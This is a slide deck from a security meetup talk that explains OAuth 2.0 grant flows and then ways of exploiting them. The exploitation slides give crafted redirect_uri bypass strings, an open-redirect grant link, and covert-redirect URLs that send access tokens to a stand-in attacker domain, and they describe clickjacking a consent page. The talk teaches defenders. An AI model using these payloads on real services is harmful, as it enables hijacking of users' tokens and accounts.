SlideShare a Scribd company logo

OAuth 2.0

Download as PPTX, PDF
Mihir Shah
Mihir Shah

This is the presentation for the OAuth protocol which i talked about at Null Humla Session on 6th of October.

Technology
1 of 29
Click to edit Master title style 1 $whoami 1 MIHIR SHAH | SHAHENSHAH GitHub: www.github.com/shahenshah99
Click to edit Master title style 2 OAuth 2.0 Authorization protocol
Click to edit Master title style 3 Agenda for today • Introduction to the OAuth 2.0 model • Receiving grants • Exploiting OAuth 2.0
Click to edit Master title style 4 Oauth 2.0 roles 4
Click to edit Master title style 5 Resource owner The resource owner is simply the user that is interested in granting a registered OAuth application to access their account. The extent to which the user data can be accessed is defined by scope. Different scope results in different kinds of OAuth 2.0 permission dialogs. 5
Click to edit Master title style 6 Client In layman's terms, a client is simply an application registered to the provider (say Facebook/Google+) and is used by the third party (say Adobe) to access or manipulate a user's or resource owner's data . This concludes that a client is merely an application which allows the third party to request on behalf of the resource owner to the OAuth provider. 6
Click to edit Master title style 7 Authorization server An authorization server is capable of granting or denying a client an access token. The authorization server authenticates the resource and, generally through various interactions, issues an access token to the client if everything goes well. A resource server and authorization server are closely knit and when in the same web application, often referred to as an OAuth API. 7
Click to edit Master title style 8 Application The application or client must be registered on the OAuth provider's website. Once the registration is done, an application is assigned a unique identifier called the client ID 8
Click to edit Master title style 9 Redirect URI Every application must redirect to a pre - determined URI once the OAuth flow is complete. By default, the authorization server rejects redirect-URI mismatches between application configuration and the actual one provided. The redirect URI is a crucial component of the OAuth flow, and hijacking this can result in nasty outcomes, which we'll see in upcoming sections of this chapter. 9
Click to edit Master title style 10 Access Tokens An access token is a secret token allotted to the application and is tied to a particular user with specific permissions. The resource server expects an access token every time a request is made to it. 10
Click to edit Master title style 11 Client ID The client ID is a unique identifier that is returned when the application is registered successfully. It is not secret information and is crucial in the working of Oauth applications. Different Oauth implementations refer to the client ID differently, for example, Application ID. 11 Client ID provided by Facebook for a dummy Oauth application
Click to edit Master title style 12 Client Secret Client secret is a unique token generated during the registration process and is tied to the client ID. As the name suggests, a client secret is private information and shouldn't be exposed. It is used internally while generating access tokens 12
Click to edit Master title style 13 Receiving Grants OAuth 2.0 basically allows a third party website to access a limited or selective set of user information on a particular website. There are different kinds of authorization flows, two common ones of which are as follows: • Authorization grant • Implicit grant 13
Click to edit Master title style 14 Authorization Grants h t t p s : / / w w w. e x a m p l e . c o m / o a u t h / a u t h o r i z e ? r e s p o n s e _ t y p e = c o d e & c l i e n t _ i d = C L I E N T _ I D & r e d i r e c t _ u r i = C A L L B A C K _ U R L & s c o p e = r e a d 14 Let's break down the different components here: • response_type: When set to code, the OAuth authorization server expects the grant to be of authorization grant type. • client_id: This is the client ID/app ID of the application. • redirect_uri: This contains a URL in percent-encoded form, and after the initial flow is complete, the authorization server redirects the flow to the specified URL. • scope: This refers to the level of access needed; this is implementation specific and varies.
Click to edit Master title style 15 Following link for example https://www.example.com/oauth/authorize?client_id=2190698099&redire ct_uri=https%3A%2F%2Ffacebook.com%2Fredirect&response_type=co de&scope=read As soon as the user allows the permission, the page redirects to the following: https://facebook.com/redirect?code=af8SFAdas Here, we see the code parameter, which contains the authorization grant code generated by the authorization server. Now this can be exchanged for an access token; this is generally done server side and a client secret must be involved. Access Token = Auth Code + Client ID + Client Secret + Redirect URI 15
Click to edit Master title style 16 https://www.example.com/ /oauth/token?client_id=2190698099&client_ secret=adb12hge&grant_type=authorization_code&code=af8SFAdas&r edirect_uri= https%3A%2F%2Ffacebook.com%2Ftoken Now the token is returned to https://facebook.com/token in JSON format, such as the following: { "access_token":" EAACEdEose0cBAE3vD" } 16
Click to edit Master title style 17 Implicit Grants The i m pli c i t gra nt i s a c o m m o n wa y to a c c es s to kens i n web a nd mobi le appli cati ons. Thi s gra nt do es n't requi re a n endpo i nt o n the c li ent to c a ll s upply - a utho ri za ti on c o de a nd c li ent s ec ret to then rec ei ve the a c c es s to ken. The i m pli c i t gra nt li nk lo o ks li ke the fo llo wi ng: https :/ / www.ex a mple.co m /o auth/ autho ri ze?res pons e_ type= to ken&c li ent_ i d= CL IEN T_ ID&redi rect_ uri = CALLB ACK_URL &sc ope=rea d,wri te If the a utho ri za ti on i s c o m pleted s uc c es s fully then, https :/ / fa cebo o k.c om /token# access_to ken=EAACEdEo se0cBAE3vD So n o w the third party can co m m u n icate with the reso u rce server usin g the fo llo win g to ken . 17
Click to edit Master title style 18 EXPLOITING OAuth 2.0 18 Open redirect – the malformed URL Our exploit page is located at -> http://exploit.example.com/ we consider a trusted website to be -> http://trusted.com Directly giving the exploit link to the users won’t work but then sending a redirect from trusted.com might work, because the users trust that website. If the trusted.com site has an Oauth server running, then all you have to do is register at over there and get a client ID, set the redirect Uri as our exploit page -> exploit.example.com https://api.trusted.com/oauth2/authorization?response_ type=code&client_id=75e7i92lbwy4p4&scope=read&redirect_ uri=https%3A%2F%2Fexploit.example.com/
Click to edit Master title style 1919 Open redirect – the malformed URL Different providers have their own implementations of OAuth 2.0, this gives way to a scenario in which a malformed grant link (non-existent or garbage values for scope, client_id and so on) results in the server redirecting the user to the redirect_uri parameter which we set earlier, that is, the exploit page. Malformed value in scope: https://api.trusted.com/oauth2/authorization?response_ type=code&client_id=75e7i92lbwy4p4&scope=blahblahblah&re direct_uri=http://exploit.example.com/ Malformed value in client_id: https://api.trusted.com/oauth2/authorization?response_ type=code&client_id=idontexistbro&scope=read&redirect_uri= http://exploit.example.com/
Click to edit Master title style 20 Response: http://exploit.example.com/?error=invalid_scope&error_d escription=The+scope+of+%22blahblahblah%22+is+unknown %2E+Please+check+that+it%27s+property+spelled+and+a+va lid+value%2E#! But regardless of the error params, the page is still redirected. This is the beauty of this attack. This may not always work, it varies from implementation to implementation. The correct way to address this thing on the provider side is to show an error message on the provider domain (authorization server) itself rather than redirecting. This flaw was present in LinkedIn until last year.
Click to edit Master title style 21 Hijacking the OAuth flow – fiddling with redirect URI the inherent risks involved in using redirect_uri in a grant situation where it can be made to redirect to a different location than the one allowed, thereby hijacking the access tokens. The application is set to allow only redirect_uri = http://example.com/token/callback. Then we can use certain tricks to circumvent the checks and hijack the tokens to our (hijacker's) domain or file.
Click to edit Master title style 22 Directory traversal tricks Directory traversal tricks assume that we can save certain files of our choice under the allowed domain; this case is common in web applications which allow uploading of files The following are the URLs which can effectively bypass the validation if traversals are not considered: http://example.com/token/callback/../../our/path http://example.com/token/callback/.%0a./.%0d./our/path http://example.com/token/callback/%252e%252e/%252e%252e/our/path /our/path///../../http://example.com/token/callback/ http://example.com/token/callback/%2e%2e/%2e%2e/our/path
Click to edit Master title style 23 Domain tricks As mentioned earlier, if the allowed redirect_uri is http://example.com/token/callback , we use the following two set tricks related to domains.
Click to edit Master title style 24 Naked Domain This means the correct redirect_uri is a naked domain, that is, the subdomain is not specified. Some implementations allow subdomains when there is a case of naked domain. One such flaw was discovered in Facebook, which had one of its Oauth applications misconfigured in the MailChimp service. Example of bypasses if naked domain is specified: https://controlledsubdomain.example.com/token/call back https://www1.example.com/token/callback https://files.example.com/token/callback
Click to edit Master title style 25 TLD Suffix confusion We can bypass certain checks if a suitable top -level domain is specified. We can bypass the redirect_uri with a .com TLD by replacing it with a suffix such as .com.mx .com.br. Examples : Original Suffixed http://example.com/token/callback http://example.com.mx/token/callback http://example.org/token/callback http://example.org.in/token/callback The basic idea here is to just leave the domain asis so that the authorization servers validate it and append a valid suffixed TLD to bypass the check. This issue has been discovered in the OAuth implementation of Instagram and Slack. • Slack: https://hackerone.com/reports/2575
Click to edit Master title style 26 Flow hijack through open redirect on client Sometimes it's easy to find an open redirect on the client website (third party) and/or its subdomains which is allowed in the application configuration. We can exploit this in an implicit grant scenario where access tokens will be redirected to the attacker's domain through a 302 redirect. Redirect:http://www.example.com/exit/redirect.php?u=http:// w ww.google.com Exploit:redirect_uri=http ://www.example.com/exit/redirect.php ?u=http://exploit.com/token/callback The access tokens will now be passed to exploit.com/token/callback. This technique is widely known, and generally dubbed, as Covert Redirect.
Click to edit Master title style 27 Force a malicious app installation F o o l i n g t h e u s e r t o c l i c k o n t h e a l l o w b u t t o n w i t h o u t t h e m u n d e r s t a n d i n g i t . T h e r e b y g r a n t i n g u s a l l t h e p e r m i s s i o n s – c l i c k j a c k i n g . T h e o n l y i s s u e t h a t m i g h t b e f a c e d i s : T h e p a g e s h o u l d a l l o w X - F R A M E - O P T I O N S h e a d e r. i . e . t h e p a g e s h o u l d b e f r e e o f a n y f r a m e - b u s t i n g c o d e . Credits: http://www.bubblecode.net
Click to edit Master title style 2828 Links for more study on Oauth 2.0 https://techzone.ergon.ch/oauth-307Redirect-idpMixUp/ http://www.oauthsecurity.com/ http://homakov.blogspot.com/ http://isciurus.blogspot.com/ http://bubblecode.net/
Click to edit Master title style 29 Thank You

Recommended

OAuth 2.0 - The fundamentals, the good , the bad, technical primer and commo...
OAuth 2.0 - The fundamentals, the good , the bad, technical primer and commo...OAuth 2.0 - The fundamentals, the good , the bad, technical primer and commo...
OAuth 2.0 - The fundamentals, the good , the bad, technical primer and commo...
Good Dog Labs, Inc.
 
Oauth 2.0
Oauth 2.0Oauth 2.0
Oauth 2.0
Manish Kumar Singh
 
OAuth 2 Presentation
OAuth 2 PresentationOAuth 2 Presentation
OAuth 2 Presentation
Mohamed Ahmed Abdullah
 
OAuth 2
OAuth 2OAuth 2
OAuth 2
ChrisWood262
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
Knoldus Inc.
 
Intro to API Security with Oauth 2.0
Intro to API Security with Oauth 2.0Intro to API Security with Oauth 2.0
Intro to API Security with Oauth 2.0
Functional Imperative
 
The State of OAuth2
The State of OAuth2The State of OAuth2
The State of OAuth2
Aaron Parecki
 
(1) OAuth 2.0 Overview
(1) OAuth 2.0 Overview(1) OAuth 2.0 Overview
(1) OAuth 2.0 Overview
anikristo
 

Recommended

OAuth 2.0 - The fundamentals, the good , the bad, technical primer and commo...
OAuth 2.0 - The fundamentals, the good , the bad, technical primer and commo...OAuth 2.0 - The fundamentals, the good , the bad, technical primer and commo...
OAuth 2.0 - The fundamentals, the good , the bad, technical primer and commo...
Good Dog Labs, Inc.
 
Oauth 2.0
Oauth 2.0Oauth 2.0
Oauth 2.0
Manish Kumar Singh
 
OAuth 2 Presentation
OAuth 2 PresentationOAuth 2 Presentation
OAuth 2 Presentation
Mohamed Ahmed Abdullah
 
OAuth 2
OAuth 2OAuth 2
OAuth 2
ChrisWood262
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
Knoldus Inc.
 
Intro to API Security with Oauth 2.0
Intro to API Security with Oauth 2.0Intro to API Security with Oauth 2.0
Intro to API Security with Oauth 2.0
Functional Imperative
 
The State of OAuth2
The State of OAuth2The State of OAuth2
The State of OAuth2
Aaron Parecki
 
(1) OAuth 2.0 Overview
(1) OAuth 2.0 Overview(1) OAuth 2.0 Overview
(1) OAuth 2.0 Overview
anikristo
 
Implementing OAuth
Implementing OAuthImplementing OAuth
Implementing OAuth
leahculver
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
Uwe Friedrichsen
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2
Aaron Parecki
 
OAuth2 Authentication
OAuth2 AuthenticationOAuth2 Authentication
OAuth2 Authentication
Ismael Costa
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
Karl McGuinness
 
OAuth2 + API Security
OAuth2 + API SecurityOAuth2 + API Security
OAuth2 + API SecurityAmila Paranawithana
 
The Many Flavors of OAuth - Understand Everything About OAuth2
The Many Flavors of OAuth - Understand Everything About OAuth2The Many Flavors of OAuth - Understand Everything About OAuth2
The Many Flavors of OAuth - Understand Everything About OAuth2
Khor SoonHin
 
OAuth - Open API Authentication
OAuth - Open API AuthenticationOAuth - Open API Authentication
OAuth - Open API Authentication
leahculver
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID Connect
Jonathan LeBlanc
 
LinkedIn OAuth: Zero To Hero
LinkedIn OAuth: Zero To HeroLinkedIn OAuth: Zero To Hero
LinkedIn OAuth: Zero To Hero
Taylor Singletary
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
CA API Management
 
OAuth and Open-id
OAuth and Open-idOAuth and Open-id
OAuth and Open-id
Parisa Moosavinezhad
 
(4) OAuth 2.0 Obtaining Authorization
(4) OAuth 2.0 Obtaining Authorization(4) OAuth 2.0 Obtaining Authorization
(4) OAuth 2.0 Obtaining Authorization
anikristo
 
Oauth2 and OWSM OAuth2 support
Oauth2 and OWSM OAuth2 supportOauth2 and OWSM OAuth2 support
Oauth2 and OWSM OAuth2 supportGaurav Sharma
 
The Current State of OAuth 2
The Current State of OAuth 2The Current State of OAuth 2
The Current State of OAuth 2
Aaron Parecki
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
Giorgio Fedon
 
O auth 2.0 authorization framework
O auth 2.0 authorization frameworkO auth 2.0 authorization framework
O auth 2.0 authorization framework
John Temoty Roca
 
Concrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryConcrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS Advisory
Minded Security
 
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
Jon Todd
 
Attacking REST API
Attacking REST APIAttacking REST API
Attacking REST API
Siddharth Bezalwar
 
Oauth 2.0 security
Oauth 2.0 securityOauth 2.0 security
Oauth 2.0 security
vinoth kumar
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
shyamraj55
 

More Related Content

What's hot

Implementing OAuth
Implementing OAuthImplementing OAuth
Implementing OAuth
leahculver
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
Uwe Friedrichsen
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2
Aaron Parecki
 
OAuth2 Authentication
OAuth2 AuthenticationOAuth2 Authentication
OAuth2 Authentication
Ismael Costa
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
Karl McGuinness
 
The Many Flavors of OAuth - Understand Everything About OAuth2
The Many Flavors of OAuth - Understand Everything About OAuth2The Many Flavors of OAuth - Understand Everything About OAuth2
The Many Flavors of OAuth - Understand Everything About OAuth2
Khor SoonHin
 
OAuth - Open API Authentication
OAuth - Open API AuthenticationOAuth - Open API Authentication
OAuth - Open API Authentication
leahculver
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID Connect
Jonathan LeBlanc
 
LinkedIn OAuth: Zero To Hero
LinkedIn OAuth: Zero To HeroLinkedIn OAuth: Zero To Hero
LinkedIn OAuth: Zero To Hero
Taylor Singletary
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
CA API Management
 
OAuth and Open-id
OAuth and Open-idOAuth and Open-id
OAuth and Open-id
Parisa Moosavinezhad
 
(4) OAuth 2.0 Obtaining Authorization
(4) OAuth 2.0 Obtaining Authorization(4) OAuth 2.0 Obtaining Authorization
(4) OAuth 2.0 Obtaining Authorization
anikristo
 
Oauth2 and OWSM OAuth2 support
Oauth2 and OWSM OAuth2 supportOauth2 and OWSM OAuth2 support
Oauth2 and OWSM OAuth2 supportGaurav Sharma
 
The Current State of OAuth 2
The Current State of OAuth 2The Current State of OAuth 2
The Current State of OAuth 2
Aaron Parecki
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
Giorgio Fedon
 
O auth 2.0 authorization framework
O auth 2.0 authorization frameworkO auth 2.0 authorization framework
O auth 2.0 authorization framework
John Temoty Roca
 
Concrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryConcrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS Advisory
Minded Security
 
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
Jon Todd
 
Attacking REST API
Attacking REST APIAttacking REST API
Attacking REST API
Siddharth Bezalwar
 

What's hot (20)

Implementing OAuth
Implementing OAuthImplementing OAuth
Implementing OAuth
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2
 
OAuth2 Authentication
OAuth2 AuthenticationOAuth2 Authentication
OAuth2 Authentication
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
 
OAuth2 + API Security
OAuth2 + API SecurityOAuth2 + API Security
OAuth2 + API Security
 
The Many Flavors of OAuth - Understand Everything About OAuth2
The Many Flavors of OAuth - Understand Everything About OAuth2The Many Flavors of OAuth - Understand Everything About OAuth2
The Many Flavors of OAuth - Understand Everything About OAuth2
 
OAuth - Open API Authentication
OAuth - Open API AuthenticationOAuth - Open API Authentication
OAuth - Open API Authentication
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID Connect
 
LinkedIn OAuth: Zero To Hero
LinkedIn OAuth: Zero To HeroLinkedIn OAuth: Zero To Hero
LinkedIn OAuth: Zero To Hero
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
 
OAuth and Open-id
OAuth and Open-idOAuth and Open-id
OAuth and Open-id
 
(4) OAuth 2.0 Obtaining Authorization
(4) OAuth 2.0 Obtaining Authorization(4) OAuth 2.0 Obtaining Authorization
(4) OAuth 2.0 Obtaining Authorization
 
Oauth2 and OWSM OAuth2 support
Oauth2 and OWSM OAuth2 supportOauth2 and OWSM OAuth2 support
Oauth2 and OWSM OAuth2 support
 
The Current State of OAuth 2
The Current State of OAuth 2The Current State of OAuth 2
The Current State of OAuth 2
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
 
O auth 2.0 authorization framework
O auth 2.0 authorization frameworkO auth 2.0 authorization framework
O auth 2.0 authorization framework
 
Concrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryConcrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS Advisory
 
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
 
Attacking REST API
Attacking REST APIAttacking REST API
Attacking REST API
 

Similar to OAuth 2.0

Oauth 2.0 security
Oauth 2.0 securityOauth 2.0 security
Oauth 2.0 security
vinoth kumar
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
shyamraj55
 
Stateless Auth using OAUTH2 & JWT
Stateless Auth using OAUTH2 & JWTStateless Auth using OAUTH2 & JWT
Stateless Auth using OAUTH2 & JWT
Mobiliya
 
Microservice security with spring security 5.1,Oauth 2.0 and open id connect
Microservice security with spring security 5.1,Oauth 2.0 and open id connect Microservice security with spring security 5.1,Oauth 2.0 and open id connect
Microservice security with spring security 5.1,Oauth 2.0 and open id connect
Nilanjan Roy
 
OAuth with Salesforce - Demystified
OAuth with Salesforce - DemystifiedOAuth with Salesforce - Demystified
OAuth with Salesforce - Demystified
Calvin Noronha
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
Gaurav Roy
 
What the Heck is OAuth and OIDC - UberConf 2018
What the Heck is OAuth and OIDC - UberConf 2018What the Heck is OAuth and OIDC - UberConf 2018
What the Heck is OAuth and OIDC - UberConf 2018
Matt Raible
 
What the Heck is OAuth and OIDC - Denver Developer Identity Workshop 2020
What the Heck is OAuth and OIDC - Denver Developer Identity Workshop 2020What the Heck is OAuth and OIDC - Denver Developer Identity Workshop 2020
What the Heck is OAuth and OIDC - Denver Developer Identity Workshop 2020
Matt Raible
 
O auth2 with angular js
O auth2 with angular jsO auth2 with angular js
O auth2 with angular js
Bixlabs
 
OAuth2 Presentaion
OAuth2 PresentaionOAuth2 Presentaion
OAuth2 Presentaion
Bhargav Surimenu
 
Ladies Be Architects - Study Group III: OAuth 2.0 (Ep 1)
Ladies Be Architects - Study Group III: OAuth 2.0 (Ep 1)Ladies Be Architects - Study Group III: OAuth 2.0 (Ep 1)
Ladies Be Architects - Study Group III: OAuth 2.0 (Ep 1)
gemziebeth
 
Introduction to OAuth
Introduction to OAuthIntroduction to OAuth
Introduction to OAuth
Mikkel Flindt Heisterberg
 
OAuth2 primer
OAuth2 primerOAuth2 primer
OAuth2 primer
Manish Pandit
 
Introduction to OAuth 2.0 - the technology you need but never really learned
Introduction to OAuth 2.0 - the technology you need but never really learnedIntroduction to OAuth 2.0 - the technology you need but never really learned
Introduction to OAuth 2.0 - the technology you need but never really learned
Mikkel Flindt Heisterberg
 
OAuth in the Wild
OAuth in the WildOAuth in the Wild
OAuth in the Wild
Victor Rentea
 
RefCard RESTful API Design
RefCard RESTful API DesignRefCard RESTful API Design
RefCard RESTful API Design
OCTO Technology
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Java User Group Latvia
 
O auth2.0 20141003
O auth2.0 20141003O auth2.0 20141003
O auth2.0 20141003
Syed Ali Raza
 
Accessing APIs using OAuth on the federated (WordPress) web
Accessing APIs using OAuth on the federated (WordPress) webAccessing APIs using OAuth on the federated (WordPress) web
Accessing APIs using OAuth on the federated (WordPress) web
Felix Arntz
 
Deep Dive into OAuth for Connected Apps
Deep Dive into OAuth for Connected AppsDeep Dive into OAuth for Connected Apps
Deep Dive into OAuth for Connected Apps
Salesforce Developers
 

Similar to OAuth 2.0 (20)

Oauth 2.0 security
Oauth 2.0 securityOauth 2.0 security
Oauth 2.0 security
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
 
Stateless Auth using OAUTH2 & JWT
Stateless Auth using OAUTH2 & JWTStateless Auth using OAUTH2 & JWT
Stateless Auth using OAUTH2 & JWT
 
Microservice security with spring security 5.1,Oauth 2.0 and open id connect
Microservice security with spring security 5.1,Oauth 2.0 and open id connect Microservice security with spring security 5.1,Oauth 2.0 and open id connect
Microservice security with spring security 5.1,Oauth 2.0 and open id connect
 
OAuth with Salesforce - Demystified
OAuth with Salesforce - DemystifiedOAuth with Salesforce - Demystified
OAuth with Salesforce - Demystified
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
 
What the Heck is OAuth and OIDC - UberConf 2018
What the Heck is OAuth and OIDC - UberConf 2018What the Heck is OAuth and OIDC - UberConf 2018
What the Heck is OAuth and OIDC - UberConf 2018
 
What the Heck is OAuth and OIDC - Denver Developer Identity Workshop 2020
What the Heck is OAuth and OIDC - Denver Developer Identity Workshop 2020What the Heck is OAuth and OIDC - Denver Developer Identity Workshop 2020
What the Heck is OAuth and OIDC - Denver Developer Identity Workshop 2020
 
O auth2 with angular js
O auth2 with angular jsO auth2 with angular js
O auth2 with angular js
 
OAuth2 Presentaion
OAuth2 PresentaionOAuth2 Presentaion
OAuth2 Presentaion
 
Ladies Be Architects - Study Group III: OAuth 2.0 (Ep 1)
Ladies Be Architects - Study Group III: OAuth 2.0 (Ep 1)Ladies Be Architects - Study Group III: OAuth 2.0 (Ep 1)
Ladies Be Architects - Study Group III: OAuth 2.0 (Ep 1)
 
Introduction to OAuth
Introduction to OAuthIntroduction to OAuth
Introduction to OAuth
 
OAuth2 primer
OAuth2 primerOAuth2 primer
OAuth2 primer
 
Introduction to OAuth 2.0 - the technology you need but never really learned
Introduction to OAuth 2.0 - the technology you need but never really learnedIntroduction to OAuth 2.0 - the technology you need but never really learned
Introduction to OAuth 2.0 - the technology you need but never really learned
 
OAuth in the Wild
OAuth in the WildOAuth in the Wild
OAuth in the Wild
 
RefCard RESTful API Design
RefCard RESTful API DesignRefCard RESTful API Design
RefCard RESTful API Design
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
 
O auth2.0 20141003
O auth2.0 20141003O auth2.0 20141003
O auth2.0 20141003
 
Accessing APIs using OAuth on the federated (WordPress) web
Accessing APIs using OAuth on the federated (WordPress) webAccessing APIs using OAuth on the federated (WordPress) web
Accessing APIs using OAuth on the federated (WordPress) web
 
Deep Dive into OAuth for Connected Apps
Deep Dive into OAuth for Connected AppsDeep Dive into OAuth for Connected Apps
Deep Dive into OAuth for Connected Apps
 

More from Mihir Shah

Windows custom shellcoding
Windows custom shellcodingWindows custom shellcoding
Windows custom shellcoding
Mihir Shah
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
Mihir Shah
 
Kubernetes
KubernetesKubernetes
Kubernetes
Mihir Shah
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
Mihir Shah
 
Securing docker containers
Securing docker containersSecuring docker containers
Securing docker containers
Mihir Shah
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Mihir Shah
 
Cracking the crypto
Cracking the cryptoCracking the crypto
Cracking the crypto
Mihir Shah
 
Stego.ppt
Stego.pptStego.ppt
Stego.ppt
Mihir Shah
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentesting
Mihir Shah
 
Reversing with gdb
Reversing with gdbReversing with gdb
Reversing with gdb
Mihir Shah
 
ROP
ROPROP
ROP
Mihir Shah
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
Mihir Shah
 
PMKID ATTACK!!
PMKID ATTACK!!PMKID ATTACK!!
PMKID ATTACK!!
Mihir Shah
 

More from Mihir Shah (13)

Windows custom shellcoding
Windows custom shellcodingWindows custom shellcoding
Windows custom shellcoding
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
 
Kubernetes
KubernetesKubernetes
Kubernetes
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
 
Securing docker containers
Securing docker containersSecuring docker containers
Securing docker containers
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
 
Cracking the crypto
Cracking the cryptoCracking the crypto
Cracking the crypto
 
Stego.ppt
Stego.pptStego.ppt
Stego.ppt
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentesting
 
Reversing with gdb
Reversing with gdbReversing with gdb
Reversing with gdb
 
ROP
ROPROP
ROP
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
 
PMKID ATTACK!!
PMKID ATTACK!!PMKID ATTACK!!
PMKID ATTACK!!
 

Recently uploaded

Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
